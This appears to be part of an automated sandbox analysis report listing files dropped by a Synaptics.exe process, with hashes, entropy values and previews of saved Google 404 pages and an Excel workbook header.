                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264147676595978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0sOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5O+pAZewRDK4mW
                                                                                                                                                      MD5:71614D71E9A40BFD8B90330D52D2BDF2
                                                                                                                                                      SHA1:81564133EF1D3466044EB6CED163BB7FFD5C40D7
                                                                                                                                                      SHA-256:7E4AC10D8589B74DD72FE54C9807CCBC4A1344B846FF70CE787B73FAC8953B86
                                                                                                                                                      SHA-512:163DE6869E7B95B79BEE1BBABF0A87A129567E0BFCBC1DF34FBB776CC7C5595D8B8B58CE6E391615950E4B95CBA9A99141382898F85301C301D1D8CF47EE4ABA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gVrV7dHI8ofWQjhkrNPrfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\CmOKjEw.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257557977344846
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0H4f3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k4P+pAZewRDK4mW
                                                                                                                                                      MD5:E4A2D9DC4AC87BFD4131A9C75CC8EF98
                                                                                                                                                      SHA1:5BECFE66D99FDC641748CBC7270DDF6A442A9EE9
                                                                                                                                                      SHA-256:32FD7845A2BCA2CBF0E6A45CC8DFB55BFE1C5717EBEA6E45E7FB4B24A6068197
                                                                                                                                                      SHA-512:05A54FB3AE52DF69F2AD842CCD81FD41C1D20F12A6E081F7027C624F6BFBDF90949303B24D13A7AB00632F511CB23838115F8EBE145D8F7E0B78E1AEE1169A4B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RfLFD4D_t73s0bqfvi9Ibw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\D7Tl1s2.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260251334508525
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                                      MD5:B5D2A38575656D5799BD1ADF70527C4D
                                                                                                                                                      SHA1:82516A3583332A997C92B2DAEEF9034A7748C592
                                                                                                                                                      SHA-256:FEBCB3C8238F60083906684360461AD078B144B4878FBF19C5226FF733F428F5
                                                                                                                                                      SHA-512:57E62AEE2C1411713054EE6A35B0369E0356A8C37381D897FB06648314A36A1B5EE5E8F64FBB66439D0257AB73E25D8073295BF88E545663469DFB4CA3F9C362
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0Emcys-PvDlv5EIW3vsZrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\EpbCydg.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2601464027522855
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0BkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++k+pAZewRDK4mW
                                                                                                                                                      MD5:A9D44F988504A99585E5B7AB768C8919
                                                                                                                                                      SHA1:8979FCC851D32E45C80A544B6E7ECBED9724975E
                                                                                                                                                      SHA-256:BFF7CF387C1CE4ED73A1BFB2F652D38D2822489B8B41CF1E31CE0E7D3748D063
                                                                                                                                                      SHA-512:956403DCA8428BD978596763E6901A2DD487836BB98779AAD80E1BFF1BF41280D1F908BAD3B6952199D3D42A8568E954A71AD9602CEBDBC93E91172CE5286197
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6s7jBmk_Q9_RgL1lj1nlCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Eyc6ffi.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.26202314889096
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0c1XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zX+pAZewRDK4mW
                                                                                                                                                      MD5:93F31B716C46213B186D4FD9C6E3C728
                                                                                                                                                      SHA1:E459E481FE68DAA0C0267E540455CF78EB48350E
                                                                                                                                                      SHA-256:BCF206BA373E168C5A2967BCB936CED029A1C4087A8631EE7663CDFEA458E36F
                                                                                                                                                      SHA-512:401368E631C65DBAD8976628B3ACE9DA469B492EFB1A98C26ECF4C49904088D861C072C3D2EAF7C359174908D80F15CEF9DA102F9F3B61F3197337151B091FE8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vOYGbDuZoC5mglJVZmknAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\FS68Zd8.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.249384897078481
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hpWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+08+pAZewRDK4mW
                                                                                                                                                      MD5:8B173ACEC03085A950D4E905F241C59A
                                                                                                                                                      SHA1:DDE53748F0ED4F4AE92D814F92C03AD1770CA23B
                                                                                                                                                      SHA-256:8F260BA250E1013B2B5251A11729BD433F40BB99240C6E386C29AEB6F0F147D9
                                                                                                                                                      SHA-512:8E0A93609F9B6F1439CDD2D4571F6A712FEC0347E25863443B69745DE7B067F995DF8EE7C55D7B87206F382434A58AC2C4D8A150F0CAB53F5047F1F481A6B1EC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n7FmyVulrDFhvyh8d559zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IXiE3lo.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257283839940624
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                      MD5:A19844AE9AC2FB8DE1E4A094572D85EC
                                                                                                                                                      SHA1:2FDB201EB42A7135A732C9F02C59DB1D240C9E24
                                                                                                                                                      SHA-256:F9579F7540688231D4CC439596AF98D2024211315CAEDA8FC5F8134B36D9E908
                                                                                                                                                      SHA-512:A38087BE4E615861F9289737624B6D823ABA5861AA44B24D3F94A5F9769597F13F8188E15451707B4D01F3E91BA5B34E98C35FA815A324C4270B7D99F56377BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8mKySF_zhrR4hRCy5Ipi1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\J6UTCx7N.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\KlDojXf.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.270010384867604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                                                      MD5:70AC3D1EE9ADABB4E69EAB29AFC6BC1E
                                                                                                                                                      SHA1:0A0A6C8A0670146737576F68FA06E646AA10BF15
                                                                                                                                                      SHA-256:33D5FCDCEE92C3816DD4728D656CA3524CDEEB8AE353E091D168F7D4F75367DE
                                                                                                                                                      SHA-512:11D5FEEEA7980F2EEBA1FCC0D6F4202AF8709C296297541C09E5FC412468A37E3DAEDF894480E9DD497517CE57428B74810770D48EF1CDEEE7E463219C404F41
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ipjEpqhVXqYULv9YDQow4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\KucYdd8.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254131385205729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+06eMDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                      MD5:79B38BEB68E1D97721E2E4BEFAD8E3A4
                                                                                                                                                      SHA1:5277DF78915CDFF408BD3A0217294D31FE7AB846
                                                                                                                                                      SHA-256:F4149A8F4072D0F483646BBE102FEF3D4046B7E4DF119E413487A0AEC11C8307
                                                                                                                                                      SHA-512:DFA21AC2A98929EEF6AC70A0EB2009336E8492CB9982F49E6BB1933A35558DD1066B7FDCB2A2F6D9081E1ACA2B3F1F0E6B93CFCDA70BDD57080C96B0606585B4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oorkudULhBzrOXA2kXypSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MxTkJg8.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264362414263429
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                      MD5:15C52094EE81C0EDF0C82DAF26097B63
                                                                                                                                                      SHA1:FE4A37D74E9E1B7D0E44077CF98E7B0DCFD54C40
                                                                                                                                                      SHA-256:30AD3BE2718C002E1EB72FD2D27B5D0B068A38175F8F8967652722FE2E78067A
                                                                                                                                                      SHA-512:CB9C2F970B7006B2BD5805299553589AA4DAF9038E7C37FBCD54DB0592D2C0B4A326779A4B3E5DFE7B8FA410A7FB3993BDE3A47BDEF3489D745E787B6FE95B84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KHOpj6np9DrD5DWTGeiamA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ROzcobd.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.274876684912383
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gxxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                      MD5:62CC759E587B9FDBB175D48757760AF0
                                                                                                                                                      SHA1:83FD78398E29B12167DB542A3A323D05AEEADA24
                                                                                                                                                      SHA-256:5D1CBEFE8DFAA432D8CA86D743A94529698127842621F907F5C4C61EA2F97B3F
                                                                                                                                                      SHA-512:75F1257E94B05D63EBB1FBD0A2BC0B7B94CF45C8AC0746DA1CF1BC0D69850B1368D15A4A73BA080DB4E87C6480FD6D535D70620D8F422C469537936910BA54F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GGPwqwwZOIQToZLXA5Q0OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RZWKgBg.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.258498303926086
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                                                      MD5:5E55BB1BF6A3E1BA14F246525D2921E4
                                                                                                                                                      SHA1:3F0A0607BD48CB09DC1CACD09EBC34E71395A0A4
                                                                                                                                                      SHA-256:E88FC7FF610996C0A0D841FE8E5E9413DD85F37609D8D86AA6DB0D1BC0E66279
                                                                                                                                                      SHA-512:242491B43A4DB8E39804A2F52C9ABA410215ADC1E3DDF4053076AD32BACFB334E77FDA7BA80ABA1E985C24C8B65A2D0A373AF28A85C92AA228E01F1C7723E08B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZAk79NgokYhEzs84NBbwbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\SR1keAJ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2650831310280255
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0f6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U6+pAZewRDK4mW
                                                                                                                                                      MD5:B2CD49CCCF11AA3F033469D7A99D0B64
                                                                                                                                                      SHA1:A2881E7799FCE3D078C1CA4A125888EAA3E72322
                                                                                                                                                      SHA-256:4478BBC319AB0243CF6F7AA1AB0666A2D6CE35E9F40CCB9AF1DF6643251F99B3
                                                                                                                                                      SHA-512:C5B8CCCEFCB89362627EBB4CA2C93EB0C3004335398C1E66D2A2B827A3DC6CBAE7DA76FFCFB9C88739DE8AA89821804972DAC38BD1E3363BD2919A725A3E6D74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FSZrcKJwpG2dArzyk2BFZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\SxRgsRn.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264009307072822
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                      MD5:2AB5C9C88B1713E3442750F2FE37BDA8
                                                                                                                                                      SHA1:91E8D110D22B9B72DB409DD5BC4E01E1376F79C4
                                                                                                                                                      SHA-256:06B78D4719E4F693796B18F9B4CDD5BB66FD2FC430670AD8E0957EF23A600E92
